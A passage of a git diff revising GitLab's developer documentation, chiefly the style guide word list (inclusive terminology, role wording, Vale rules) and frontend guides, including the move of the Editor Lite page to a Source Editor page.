top bar, select **Menu >** **{admin}** **Admin**. @@ -1510,25 +1466,6 @@ It renders on the GitLab documentation site as: To maintain consistency through GitLab documentation, use these styles and terms. -### Merge requests (MRs) - -Merge requests allow you to exchange changes you made to source code and -collaborate with other people on the same project. - -- Use lowercase _merge requests_ regardless of whether referring to the feature - or individual merge requests. - -As noted in the GitLab [Writing Style Guidelines](https://about.gitlab.com/handbook/communication/#writing-style-guidelines), -if you use the _MR_ acronym, expand it at least once per document page. -Typically, the first use would be phrased as _merge request (MR)_ with subsequent -instances being _MR_. - -Examples: - -- "We prefer GitLab merge requests". -- "Open a merge request to fix a broken link". -- "After you open a merge request (MR), submit your MR for review and approval". - ### Describe UI elements Follow these styles when you're describing user interface elements in an @@ -1558,7 +1495,7 @@ elements: ## GitLab versions -GitLab product documentation pages (not including [Contributor and Development](../../README.md) +GitLab product documentation pages (not including [Contributor and Development](../../index.md) pages in the `/development` directory) can include version information to help users be aware of recent improvements or additions. @@ -1594,7 +1531,8 @@ the section. The version information must: - Be surrounded by blank lines. - Start with `>`. If there are multiple bullets, each line must start with `> -`. - The string must include these words in this order (capitalization doesn't matter): - - `introduced`, `deprecated`, `moved` + - `introduced`, `deprecated`, `changed`, `moved`, `recommended` (as in the + [feature flag documentation](../feature_flags.md)), `removed`, or `renamed` - `in` or `to` - `GitLab` - Whenever possible, include a link to the completed issue, merge request, or epic @@ -1757,7 +1695,7 @@ badges and tooltips (`<span class="badge-trigger free">`). | _Only_ GitLab Ultimate SaaS (no self-managed instances) | `**(ULTIMATE SAAS)**` | Topics that mention the `gitlab.rb` file are referring to -self-managed instances of GitLab. To prevent confusion, include the relevant `TIER ONLY` +self-managed instances of GitLab. To prevent confusion, include the relevant `TIER SELF` tier badge on the highest applicable heading level on the page. diff --git a/doc/development/documentation/styleguide/word_list.md b/doc/development/documentation/styleguide/word_list.md index fd8766bbfb6..3fba9078bab 100644 --- a/doc/development/documentation/styleguide/word_list.md +++ b/doc/development/documentation/styleguide/word_list.md @@ -9,6 +9,11 @@ description: 'Writing styles, markup, formatting, and other standards for GitLab To help ensure consistency in the documentation, follow this guidance. +For guidance not on this page, we defer to these style guides: + +- [Microsoft Style Guide](https://docs.microsoft.com/en-us/style-guide/welcome/) +- [Google Developer Documentation Style Guide](https://developers.google.com/style) + <!-- vale off --> <!-- markdownlint-disable --> @@ -22,7 +27,13 @@ Use **administration**, **administrator**, **administer**, or **Admin Area** ins ## allow, enable -Try to avoid, unless you are talking about security-related features. For example, instead of "This feature allows you to create a pipeline," use "Use this feature to create a pipeline." This phrasing is more active and is from the user perspective, rather than the person who implemented the feature. [View details](https://docs.microsoft.com/en-us/style-guide/a-z-word-list-term-collections/a/allow-allows). +Try to avoid, unless you are talking about security-related features. For example: + +- Avoid: This feature allows you to create a pipeline. +- Use instead: Use this feature to create a pipeline. + +This phrasing is more active and is from the user perspective, rather than the person who implemented the feature. +[View details in the Microsoft style guide](https://docs.microsoft.com/en-us/style-guide/a-z-word-list-term-collections/a/allow-allows). ## and/or @@ -32,25 +43,49 @@ Instead of **and/or**, use or or rewrite the sentence to spell out both options. Try to avoid extra words when referring to an example or table in a documentation page, but if required, use **following** instead. +## blacklist + +Do not use. Another option is **denylist**. ([Vale](../testing.md#vale) rule: [`InclusionCultural.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/InclusionCultural.yml)) + ## currently Do not use when talking about the product or its features. The documentation describes the product as it is today. ([Vale](../testing.md#vale) rule: [`CurrentStatus.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/CurrentStatus.yml)) ## Developer -When writing about the Developer role, use a capital "D." Do not use the phrase, "if you are a developer" -to mean someone who is assigned the Developer role. Instead, write it out. "If you are assigned the Developer role..." +When writing about the Developer role: -Do not use "Developer permissions." A user who is assigned the Developer role has a set of associated permissions. +- Use a capital **D**. +- Do not use the phrase, **if you are a developer** to mean someone who is assigned the Developer + role. Instead, write it out. For example, **if you are assigned the Developer role**. +- To describe a situation where the Developer role is the minimum required: + - Avoid: **the Developer role or higher** + - Use instead: **at least the Developer role** + +Do not use **Developer permissions**. A user who is assigned the Developer role has a set of associated permissions. + +## disable + +See [the Microsoft style guide](https://docs.microsoft.com/en-us/style-guide/a-z-word-list-term-collections/d/disable-disabled) for guidance. +Use **inactive** or **off** instead. ([Vale](../testing.md#vale) rule: [`InclusionAbleism.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/InclusionAbleism.yml)) ## easily -Do not use. If the user doesn't find the process to be these things, we lose their trust. +Do not use. If the user doesn't find the process to be easy, we lose their trust. ## e.g. Do not use Latin abbreviations. Use **for example**, **such as**, **for instance**, or **like** instead. ([Vale](../testing.md#vale) rule: [`LatinTerms.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/LatinTerms.yml)) +## email + +Do not use **e-mail** with a hyphen. When plural, use **emails** or **email messages**. + +## enable + +See [the Microsoft style guide](https://docs.microsoft.com/en-us/style-guide/a-z-word-list-term-collections/e/enable-enables) for guidance. +Use **active** or **on** instead. ([Vale](../testing.md#vale) rule: [`InclusionAbleism.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/InclusionAbleism.yml)) + ## future tense When possible, use present tense instead. For example, use `after you execute this command, GitLab displays the result` instead of `after you execute this command, GitLab will display the result`. ([Vale](../testing.md#vale) rule: [`FutureTense.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/FutureTense.yml)) @@ -59,16 +94,35 @@ When possible, use present tense instead. For example, use `after you execute th Do not make possessive (GitLab's). This guidance follows [GitLab Brand Guidelines](https://about.gitlab.com/handbook/marketing/corporate-marketing/brand-activation/brand-guidelines/#trademark). +### GitLab.com + +Refers to the GitLab instance managed by GitLab itself. + +### GitLab SaaS + +Refers to the product license that provides access to GitLab.com. Does not refer to the +GitLab instance managed by GitLab itself. + +### GitLab self-managed + +Refers to the product license for GitLab instances managed by customers themselves. + ## Guest -When writing about the Guest role, use a capital "G." Do not use the phrase, "if you are a guest" -to mean someone who is assigned the Guest role. Instead, write it out. "If you are assigned the Guest role..." +When writing about the Guest role: + +- Use a capital **G**. +- Do not use the phrase, **if you are a guest** to mean someone who is assigned the Guest + role. Instead, write it out. For example, **if you are assigned the Guest role**. +- To describe a situation where the Guest role is the minimum required: + - Avoid: **the Guest role or higher** + - Use instead: **at least the Guest role** -Do not use "Guest permissions." A user who is assigned the Guest role has a set of associated permissions. +Do not use **Guest permissions**. A user who is assigned the Guest role has a set of associated permissions. ## handy -Do not use. If the user doesn't find the process to be these things, we lose their trust. +Do not use. If the user doesn't find the feature or process to be handy, we lose their trust. ## high availability, HA @@ -84,10 +138,28 @@ Do not use Latin abbreviations. Use **that is** instead. ([Vale](../testing.md#v ## Maintainer -When writing about the Maintainer role, use a capital "M." Do not use the phrase, "if you are a maintainer" -to mean someone who is assigned the Maintainer role. Instead, write it out. "If you are assigned the Maintainer role..." +When writing about the Maintainer role: + +- Use a capital **M**. +- Do not use the phrase, **if you are a maintainer** to mean someone who is assigned the Maintainer + role. Instead, write it out. For example, **if you are assigned the Maintainer role**. +- To describe a situation where the Maintainer role is the minimum required: + - Avoid: **the Maintainer role or higher** + - Use instead: **at least the Maintainer role** + +Do not use **Maintainer permissions**. A user who is assigned the Maintainer role has a set of associated permissions. + +## mankind + +Do not use. Use **people** or **humanity** instead. ([Vale](../testing.md#vale) rule: [`InclusionGender.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/InclusionGender.yml)) -Do not use "Maintainer permissions." A user who is assigned the Maintainer role has a set of associated permissions. +## manpower + +Do not use. Use words like **workforce** or **GitLab team members**. ([Vale](../testing.md#vale) rule: [`InclusionGender.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/InclusionGender.yml)) + +## master + +Do not use. Options are **primary** or **main**. ([Vale](../testing.md#vale) rule: [`InclusionCultural.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/InclusionCultural.yml)) ## may, might @@ -97,12 +169,19 @@ Do not use "Maintainer permissions." A user who is assigned the Maintainer role Do not use first-person singular. Use **you**, **we**, or **us** instead. ([Vale](../testing.md#vale) rule: [`FirstPerson.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/FirstPerson.yml)) +## merge requests + +Lowercase. If you use **MR** as the acronym, spell it out on first use. + ## Owner -When writing about the Owner role, use a capital "M." Do not use the phrase, "if you are an owner" -to mean someone who is assigned the Owner role. Instead, write it out. "If you are assigned the Owner role..." +When writing about the Owner role: + +- Use a capital **O**. +- Do not use the phrase, **if you are an owner** to mean someone who is assigned the Owner + role. Instead, write it out. For example, **if you are assigned the Owner role**. -Do not use "Owner permissions." A user who is assigned the Owner role has a set of associated permissions. +Do not use **Owner permissions**. A user who is assigned the Owner role has a set of associated permissions. ## permissions @@ -118,38 +197,68 @@ Do not use. Doing so may negatively affect other users and contributors, which i ## Reporter -When writing about the Reporter role, use a capital "R." Do not use the phrase, "if you are a reporter" -to mean someone who is assigned the Reporter role. Instead, write it out. "If you are assigned the Reporter role..." +When writing about the Reporter role: -Do not use "Reporter permissions." A user who is assigned the Reporter role has a set of associated permissions. +- Use a capital **R**. +- Do not use the phrase, **if you are a reporter** to mean someone who is assigned the Reporter + role. Instead, write it out. For example, **if you are assigned the Reporter role**. +- To describe a situation where the Reporter role is the minimum required: + - Avoid: **the Reporter role or higher** + - Use instead: **at least the Reporter role** + +Do not use **Reporter permissions**. A user who is assigned the Reporter role has a set of associated permissions. ## roles Do not use roles and permissions interchangeably. Each user is assigned a role. Each role includes a set of permissions. +## sanity check + +Do not use. Use **check for completeness** instead. ([Vale](../testing.md#vale) rule: [`InclusionAbleism.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/InclusionAbleism.yml)) + ## scalability Do not use when talking about increasing GitLab performance for additional users. The words scale or scaling are sometimes acceptable, but references to increasing GitLab performance for additional users should direct readers to the GitLab [reference architectures](../../../administration/reference_architectures/index.md) page. -## simply +## setup, set up + +Use **setup** as a noun, and **set up** as a verb. For example: + +- Your remote office setup is amazing. +- To set up your remote office correctly, consider the ergonomics of your work area. + +## simply, simple -Do not use. If the user doesn't find the process to be these things, we lose their trust. +Do not use. If the user doesn't find the process to be simple, we lose their trust. ## slashes -Instead of **and/or**, use **or** or another sensible construction. This rule also applies to other slashes, like **follow/unfollow**. Some exceptions (like **CI/CD**) are allowed. +Instead of **and/or**, use **or** or re-write the sentence. This rule also applies to other slashes, like **follow/unfollow**. Some exceptions (like **CI/CD**) are allowed. + +## slave + +Do not use. Another option is **secondary**. ([Vale](../testing.md#vale) rule: [`InclusionCultural.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/InclusionCultural.yml)) ## subgroup -Use instead of `sub-group`. +Use instead of **sub-group**. ## that -Do not use. Example: `the file that you save` can be `the file you save`. +Do not use. For example: + +- Avoid: The file that you save... +- Use instead: The file you save... + +## they + +Avoid the use of gender-specific pronouns, unless referring to a specific person. +Use a singular [they](https://developers.google.com/style/pronouns#gender-neutral-pronouns) as +a gender-neutral pronoun. ## useful -Do not use. If the user doesn't find the process to be these things, we lose their trust. +Do not use. If the user doesn't find the process to be useful, we lose their trust. ## utilize @@ -159,5 +268,18 @@ Do not use. Use **use** instead. It's more succinct and easier for non-native En Do not use Latin abbreviations. Use **with**, **through**, or **by using** instead. ([Vale](../testing.md#vale) rule: [`LatinTerms.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/LatinTerms.yml)) +## we + +Try to avoid **we** and focus instead on how the user can accomplish something in GitLab. + +- Avoid: We created a feature for you to add widgets. +- Instead, use: Use widgets when you have work you want to organize. + +One exception: You can use **we recommend** instead of **it is recommended** or **GitLab recommends**. + +## whitelist + +Do not use. Another option is **allowlist**. ([Vale](../testing.md#vale) rule: [`InclusionCultural.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/InclusionCultural.yml)) + <!-- vale on --> <!-- markdownlint-enable --> diff --git a/doc/development/documentation/testing.md b/doc/development/documentation/testing.md index b634e2b93db..ddd44801ae9 100644 --- a/doc/development/documentation/testing.md +++ b/doc/development/documentation/testing.md @@ -210,6 +210,20 @@ Vale returns three types of results: `suggestion`, `warning`, and `error`: of how to resolve the error. Errors break CI and are displayed in CI job output. See a list of [error-level rules](https://gitlab.com/search?utf8=✓&snippets=false&scope=&repository_ref=master&search=path%3Adoc%2F.vale%2Fgitlab+Error%3A&group_id=9970&project_id=278964). +#### Vale spelling test + +When Vale flags a valid word as a spelling mistake, you can fix it following these +guidelines: + +| Flagged word | Guideline | +|------------------------------------------------------|-----------| +| jargon | Rewrite the sentence to avoid it. | +| *correctly-capitalized* name of a product or service | Add the word to the [vale spelling exceptions list](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/spelling-exceptions.txt). | +| name of a person | Remove the name if it's not needed, or [add the vale exception code in-line](#disable-vale-tests). | +| a command, variable, code, or similar | Put it in backticks or a code block. For example: ``The git clone command can be used with the CI_COMMIT_BRANCH variable.`` -> ``The `git clone` command can be used with the `CI_COMMIT_BRANCH` variable.`` | +| UI text from GitLab | Verify it correctly matches the UI, then: If it does not match the UI, update it. If it matches the UI, but the UI seems incorrect, create an issue to see if the UI needs to be fixed. If it matches the UI and seems correct, add it to the [vale spelling exceptions list](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/.vale/gitlab/spelling-exceptions.txt). | +| UI text from a third-party product | Rewrite the sentence to avoid it, or [add the vale exception code in-line](#disable-vale-tests). | + ### Install linters At a minimum, install [markdownlint](#markdownlint) and [Vale](#vale) to match the checks run in diff --git a/doc/development/documentation/workflow.md b/doc/development/documentation/workflow.md index f035b4d0888..31c38bc1446 100644 --- a/doc/development/documentation/workflow.md +++ b/doc/development/documentation/workflow.md @@ -63,7 +63,7 @@ To update GitLab documentation: 1. Follow the [Merge Request Guidelines](../contributing/merge_request_workflow.md#merge-request-guidelines). NOTE: -Work in a fork if you do not have Developer access to the GitLab project. +Work in a fork if you do not have the Developer role in the GitLab project. ### Ask for help diff --git a/doc/development/emails.md b/doc/development/emails.md index 3e651a6efb8..c1054077f9e 100644 --- a/doc/development/emails.md +++ b/doc/development/emails.md @@ -141,4 +141,4 @@ Please note that `path/to/project` is used in GitLab as the handler for the Serv --- -[Return to Development documentation](README.md) +[Return to Development documentation](index.md) diff --git a/doc/development/experiment_guide/gitlab_experiment.md b/doc/development/experiment_guide/gitlab_experiment.md index 820d1da0080..33222b0492c 100644 --- a/doc/development/experiment_guide/gitlab_experiment.md +++ b/doc/development/experiment_guide/gitlab_experiment.md @@ -513,6 +513,11 @@ expect(experiment(:example)).to track(:my_event, value: 1, property: '_property_ experiment(:example, :variant_name, foo: :bar).track(:my_event, value: 1, property: '_property_') ``` +### Recording and assignment tracking + +To test assignment tracking and the `record!` method, you can use or adopt the following +shared example: [tracks assignment and records the subject](https://gitlab.com/gitlab-org/gitlab/blob/master/spec/support/shared_examples/lib/gitlab/experimentation_shared_examples.rb). + ## Experiments in the client layer This is in flux as of GitLab 13.10, and can't be documented just yet. @@ -588,7 +593,7 @@ When there is no experiment data in the `window.gon.experiment` object for the g NOTE: We use the terms "enabled" and "disabled" here, even though it's against our -[documentation style guide recommendations](../documentation/styleguide/index.md#avoid-ableist-language) +[documentation style guide recommendations](../documentation/styleguide/word_list.md#enable) because these are the terms that the feature flag documentation uses. You may already be familiar with the concept of feature flags in GitLab, but using diff --git a/doc/development/fe_guide/accessibility.md b/doc/development/fe_guide/accessibility.md index 15818941b24..0cd7cf58b58 100644 --- a/doc/development/fe_guide/accessibility.md +++ b/doc/development/fe_guide/accessibility.md @@ -510,7 +510,7 @@ Proper research and testing should be done to ensure compliance with [WCAG](http ### Viewing the browser accessibility tree - [Firefox DevTools guide](https://developer.mozilla.org/en-US/docs/Tools/Accessibility_inspector#accessing_the_accessibility_inspector) -- [Chrome DevTools guide](https://developers.google.com/web/tools/chrome-devtools/accessibility/reference#pane) +- [Chrome DevTools guide](https://developer.chrome.com/docs/devtools/accessibility/reference#pane) ### Browser extensions diff --git a/doc/development/fe_guide/content_editor.md b/doc/development/fe_guide/content_editor.md index f6329f39636..6cf4076bf83 100644 --- a/doc/development/fe_guide/content_editor.md +++ b/doc/development/fe_guide/content_editor.md @@ -54,7 +54,7 @@ the status of the ongoing development for CommonMark and GitLab Flavored Markdow To include the Content Editor in your feature, import the `createContentEditor` factory function and the `ContentEditor` Vue component. `createContentEditor` sets up an instance -of [tiptap's Editor class](https://www.tiptap.dev/api/editor) with all the necessary +of [tiptap's Editor class](https://www.tiptap.dev/api/editor/) with all the necessary extensions to support editing GitLab Flavored Markdown content. It also creates a Markdown serializer that allows exporting tiptap's document format to Markdown. @@ -90,7 +90,9 @@ export default { try { await this.contentEditor.setSerializedContent(this.content); } catch (e) { - createFlash(__('There was an error loading content in the editor'), e); + createFlash({ + message: __('There was an error loading content in the editor'), error: e + }); } }, methods: { diff --git a/doc/development/fe_guide/editor_lite.md b/doc/development/fe_guide/editor_lite.md index f28588c23e9..5020bf9eeeb 100644 --- a/doc/development/fe_guide/editor_lite.md +++ b/doc/development/fe_guide/editor_lite.md @@ -1,264 +1,9 @@ --- -stage: Create -group: Editor -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +redirect_to: 'source_editor.md' +remove_date: '2021-09-19' --- -# Editor Lite **(FREE)** +This document was moved to [another location](source_editor.md). -**Editor Lite** provides the editing experience at GitLab. This thin wrapper around -[the Monaco editor](https://microsoft.github.io/monaco-editor/) provides necessary -helpers and abstractions, and extends Monaco [using extensions](#extensions). Multiple -GitLab features use it, including: - -- [Web IDE](../../user/project/web_ide/index.md) -- [CI Linter](../../ci/lint.md) -- [Snippets](../../user/snippets.md) -- [Web Editor](../../user/project/repository/web_editor.md) -- [Security Policies](../../user/application_security/threat_monitoring/index.md) - -## How to use Editor Lite - -Editor Lite is framework-agnostic and can be used in any application, including both -Rails and Vue. To help with integration, we have the dedicated `<editor-lite>` -Vue component, but the integration of Editor Lite is generally straightforward: - -1. Import Editor Lite: - - ```javascript - import EditorLite from '~/editor/editor_lite'; - ``` - -1. Initialize global editor for the view: - - ```javascript - const editor = new EditorLite({ - // Editor Options. - // The list of all accepted options can be found at - // https://microsoft.github.io/monaco-editor/api/enums/monaco.editor.editoroption.html - }); - ``` - -1. Create an editor's instance: - - ```javascript - editor.createInstance({ - // Editor Lite configuration options. - }) - ``` - -An instance of Editor Lite accepts the following configuration options: - -| Option | Required? | Description | -| -------------- | ------- | ---- | -| `el` | `true` | `HTML Node`: The element on which to render the editor. | -| `blobPath` | `false` | `String`: The name of a file to render in the editor, used to identify the correct syntax highlighter to use with that file, or another file type. Can accept wildcards like `*.js` when the actual filename isn't known or doesn't play any role. | -| `blobContent` | `false` | `String`: The initial content to render in the editor. | -| `extensions` | `false` | `Array`: Extensions to use in this instance. | -| `blobGlobalId` | `false` | `String`: An auto-generated property.<br>**Note:** This property may go away in the future. Do not pass `blobGlobalId` unless you know what you're doing.| -| Editor Options | `false` | `Object(s)`: Any property outside of the list above is treated as an Editor Option for this particular instance. Use this field to override global Editor Options on the instance level. A full [index of Editor Options](https://microsoft.github.io/monaco-editor/api/enums/monaco.editor.editoroption.html) is available. | - -## API - -The editor uses the same public API as -[provided by Monaco editor](https://microsoft.github.io/monaco-editor/api/interfaces/monaco.editor.istandalonecodeeditor.html) -with additional functions on the instance level: - -| Function | Arguments | Description -| --------------------- | ----- | ----- | -| `updateModelLanguage` | `path`: String | Updates the instance's syntax highlighting to follow the extension of the passed `path`. Available only on the instance level.| -| `use` | Array of objects | Array of extensions to apply to the instance. Accepts only the array of _objects_. You must fetch the extensions' ES6 modules must be fetched and resolved in your views or components before they are passed to `use`. This property is available on _instance_ (applies extension to this particular instance) and _global editor_ (applies the same extension to all instances) levels. | -| Monaco Editor options | See [documentation](https://microsoft.github.io/monaco-editor/api/interfaces/monaco.editor.istandalonecodeeditor.html) | Default Monaco editor options | - -## Tips - -1. Editor's loading state. - - The loading state is built in to Editor Lite, making spinners and loaders - rarely needed in HTML. To benefit the built-in loading state, set the `data-editor-loading` - property on the HTML element that should contain the editor. When bootstrapping, - Editor Lite shows the loader automatically. - -  - -1. Update syntax highlighting if the filename changes. - - ```javascript - // fileNameEl here is the HTML input element that contains the file name - fileNameEl.addEventListener('change', () => { - this.editor.updateModelLanguage(fileNameEl.value); - }); - ``` - -1. Get the editor's content. - - We may set up listeners on the editor for every change, but it rapidly can become - an expensive operation. Instead, get the editor's content when it's needed. - For example, on a form's submission: - - ```javascript - form.addEventListener('submit', () => { - my_content_variable = this.editor.getValue(); - }); - ``` - -1. Performance - - Even though Editor Lite itself is extremely slim, it still depends on Monaco editor, - which adds weight. Every time you add Editor Lite to a view, the JavaScript bundle's - size significantly increases, affecting your view's loading performance. We recommend - you import the editor on demand if either: - - - You're uncertain if the view needs the editor. - - The editor is a secondary element of the view. - - Loading Editor Lite on demand is handled like loading any other module: - - ```javascript - someActionFunction() { - import(/* webpackChunkName: 'EditorLite' */ '~/editor/editor_lite'). - then(({ default: EditorLite }) => { - const editor = new EditorLite(); - ... - }); - ... - } - ``` - -## Extensions - -Editor Lite provides a universal, extensible editing tool to the whole product, -and doesn't depend on any particular group. Even though the Editor Lite's core is owned by -[Create::Editor FE Team](https://about.gitlab.com/handbook/engineering/development/dev/create-editor/), -any group can own the extensions—the main functional elements. The goal of -Editor Lite extensions is to keep the editor's core slim and stable. Any -needed features can be added as extensions to this core. Any group can -build and own new editing features without worrying about changes to Editor Lite -breaking or overriding them. - -You can depend on other modules in your extensions. This organization helps keep -the size of Editor Lite's core at bay by importing dependencies only when needed. - -Structurally, the complete implementation of Editor Lite can be presented as this diagram: - -```mermaid -graph TD; - B[Extension 1]---A[Editor Lite] - C[Extension 2]---A[Editor Lite] - D[Extension 3]---A[Editor Lite] - E[...]---A[Editor Lite] - F[Extension N]---A[Editor Lite] - A[Editor Lite]---Z[Monaco] -``` - -An extension is an ES6 module that exports a JavaScript object: - -```javascript -import { Position } from 'monaco-editor'; - -export default { - navigateFileStart() { - this.setPosition(new Position(1, 1)); - }, -}; - -``` - -In the extension's functions, `this` refers to the current Editor Lite instance. -Using `this`, you get access to the complete instance's API, such as the -`setPosition()` method in this particular case. - -### Using an existing extension - -Adding an extension to Editor Lite's instance requires the following steps: - -```javascript -import EditorLite from '~/editor/editor_lite'; -import MyExtension from '~/my_extension'; - -const editor = new EditorLite().createInstance({ - ... -}); -editor.use(MyExtension); -``` - -### Creating an extension - -Let's create our first Editor Lite extension. Extensions are -[ES6 modules](https://hacks.mozilla.org/2015/08/es6-in-depth-modules/) exporting a -basic `Object`, used to extend Editor Lite's features. As a test, let's -create an extension that extends Editor Lite with a new function that, when called, -outputs the editor's content in `alert`. - -`~/my_folder/my_fancy_extension.js:` - -```javascript -export default { - throwContentAtMe() { - alert(this.getValue()); - }, -}; -``` - -In the code example, `this` refers to the instance. By referring to the instance, -we can access the complete underlying -[Monaco editor API](https://microsoft.github.io/monaco-editor/api/interfaces/monaco.editor.istandalonecodeeditor.html), -which includes functions like `getValue()`. - -Now let's use our extension: - -`~/my_folder/component_bundle.js`: - -```javascript -import EditorLite from '~/editor/editor_lite'; -import MyFancyExtension from './my_fancy_extension'; - -const editor = new EditorLite().createInstance({ - ... -}); -editor.use(MyFancyExtension); -... -someButton.addEventListener('click', () => { - editor.throwContentAtMe(); -}); -``` - -First of all, we import Editor Lite and our new extension. Then we create the -editor and its instance. By default Editor Lite has no `throwContentAtMe` method. -But the `editor.use(MyFancyExtension)` line brings that method to our instance. -After that, we can use it any time we need it. In this case, we call it when some -theoretical button has been clicked. - -This script would result in an alert containing the editor's content when `someButton` is clicked. - - - -### Tips - -1. Performance - - Just like Editor Lite itself, any extension can be loaded on demand to not harm - loading performance of the views: - - ```javascript - const EditorPromise = import( - /* webpackChunkName: 'EditorLite' */ '~/editor/editor_lite' - ); - const MarkdownExtensionPromise = import('~/editor/editor_markdown_ext'); - - Promise.all([EditorPromise, MarkdownExtensionPromise]) - .then(([{ default: EditorLite }, { default: MarkdownExtension }]) => { - const editor = new EditorLite().createInstance({ - ... - }); - editor.use(MarkdownExtension); - }); - ``` - -1. Using multiple extensions - - Just pass the array of extensions to your `use` method: - - ```javascript - editor.use([FileTemplateExtension, MyFancyExtension]); - ``` +<!-- This redirect file can be deleted after <2021-09-19>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/fe_guide/frontend_faq.md b/doc/development/fe_guide/frontend_faq.md index 6b9d5ace4e6..1e8f7f5fb81 100644 --- a/doc/development/fe_guide/frontend_faq.md +++ b/doc/development/fe_guide/frontend_faq.md @@ -157,7 +157,7 @@ export const fetchFoos = ({ state }) => { Sometimes it's necessary to test locally what the frontend production build would produce, to do so the steps are: 1. Stop webpack: `gdk stop webpack`. -1. Open `gitlab.yaml` located in your `gitlab` installation folder, scroll down to the `webpack` section and change `dev_server` to `enabled: false`. +1. Open `gitlab.yaml` located in `gitlab/config` folder, scroll down to the `webpack` section, and change `dev_server` to `enabled: false`. 1. Run `yarn webpack-prod && gdk restart rails-web`. The production build takes a few minutes to be completed. Any code changes at this point are diff --git a/doc/development/fe_guide/graphql.md b/doc/development/fe_guide/graphql.md index 844ef2156d9..7fa9e957f56 100644 --- a/doc/development/fe_guide/graphql.md +++ b/doc/development/fe_guide/graphql.md @@ -906,6 +906,35 @@ apollo: { }, ``` +### Best Practices + +#### When to use (and not use) `update` hook in mutations + +Apollo Client's [`.mutate()`](https://www.apollographql.com/docs/react/api/core/ApolloClient/#ApolloClient.mutate) +method exposes an `update` hook that is invoked twice during the mutation lifecycle: + +- Once at the beginning. That is, before the mutation has completed. +- Once after the mutation has completed. + +You should use this hook only if you're adding or removing an item from the store +(that is, ApolloCache). If you're _updating_ an existing item, it is usually represented by +a global `id`. + +In that case, presence of this `id` in your mutation query definition makes the store update +automatically. Here's an example of a typical mutation query with `id` present in it: + +```graphql +mutation issueSetWeight($input: IssueSetWeightInput!) { + issuableSetWeight: issueSetWeight(input: $input) { + issuable: issue { + id + weight + } + errors + } +} +``` + ### Testing #### Generating the GraphQL schema diff --git a/doc/development/fe_guide/index.md b/doc/development/fe_guide/index.md index 00f0d72571a..325310ad05c 100644 --- a/doc/development/fe_guide/index.md +++ b/doc/development/fe_guide/index.md @@ -95,7 +95,7 @@ How we implement [keyboard shortcuts](keyboard_shortcuts.md) that can be customi ## Editors -GitLab text editing experiences are provided by the [Source Editor](editor_lite.md) and +GitLab text editing experiences are provided by the [Source Editor](source_editor.md) and the [Content Editor](content_editor.md). ## Frontend FAQ diff --git a/doc/development/fe_guide/performance.md b/doc/development/fe_guide/performance.md index dd3945ae324..e7f347554d7 100644 --- a/doc/development/fe_guide/performance.md +++ b/doc/development/fe_guide/performance.md @@ -255,18 +255,18 @@ We support two types of prefetching for the chunks: - The [`prefetch` link type](https://developer.mozilla.org/en-US/docs/Web/HTML/Link_types/prefetch) is used to prefetch a chunk for the future navigation -- The [`preload` link type](https://developer.mozilla.org/en-US/docs/Web/HTML/Link_types/preloadh) - is used to prefetch a chunk that is crucial for the current navigation but is not +- The [`preload` link type](https://developer.mozilla.org/en-US/docs/Web/HTML/Link_types/preload) + is used to prefetch a chunk that is crucial for the current navigation but is not discovered until later in the rendering process -Both `prefetch` and `preload` links bring the loading performance benefit to the pages. Both are +Both `prefetch` and `preload` links bring the loading performance benefit to the pages. Both are fetched asynchronously, but contrary to [deferring the loading](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/script#attr-defer) of the assets which is used for other JavaScript resources in the product by default, `prefetch` and -`preload` neither parse nor execute the fetched script unless explicitly imported in any JavaScript -module. This allows to cache the fetched resources without blocking the execution of the +`preload` neither parse nor execute the fetched script unless explicitly imported in any JavaScript +module. This allows to cache the fetched resources without blocking the execution of the remaining page resources. -To prefetch a JavaScript chunk in a HAML view, `:prefetch_asset_tags` with the combination of +To prefetch a JavaScript chunk in a HAML view, `:prefetch_asset_tags` with the combination of the `webpack_preload_asset_tag` helper is provided: ```javascript @@ -280,8 +280,8 @@ This snippet will add a new `<link rel="preload">` element into the resulting HT <link rel="preload" href="/assets/webpack/monaco.chunk.js" as="script" type="text/javascript"> ``` -By default, `webpack_preload_asset_tag` will `preload` the chunk. You don't need to worry about -`as` and `type` attributes for preloading the JavaScript chunks. However, when a chunk is not +By default, `webpack_preload_asset_tag` will `preload` the chunk. You don't need to worry about +`as` and `type` attributes for preloading the JavaScript chunks. However, when a chunk is not critical, for the current navigation, one has to explicitly request `prefetch`: ```javascript @@ -454,5 +454,5 @@ General tips: - [WebPage Test](https://www.webpagetest.org) for testing site loading time and size. - [Google PageSpeed Insights](https://developers.google.com/speed/pagespeed/insights/) grades web pages and provides feedback to improve the page. -- [Profiling with Chrome DevTools](https://developers.google.com/web/tools/chrome-devtools/) +- [Profiling with Chrome DevTools](https://developer.chrome.com/docs/devtools/) - [Browser Diet](https://browserdiet.com/) is a community-built guide that catalogues practical tips for improving web page performance. diff --git a/doc/development/fe_guide/source_editor.md b/doc/development/fe_guide/source_editor.md new file mode 100644 index 00000000000..fc128c0ecb1 --- /dev/null +++ b/doc/development/fe_guide/source_editor.md @@ -0,0 +1,264 @@ +--- +stage: Create +group: Editor +info: To determine the technical writer assigned to the Stage/Group associated with this 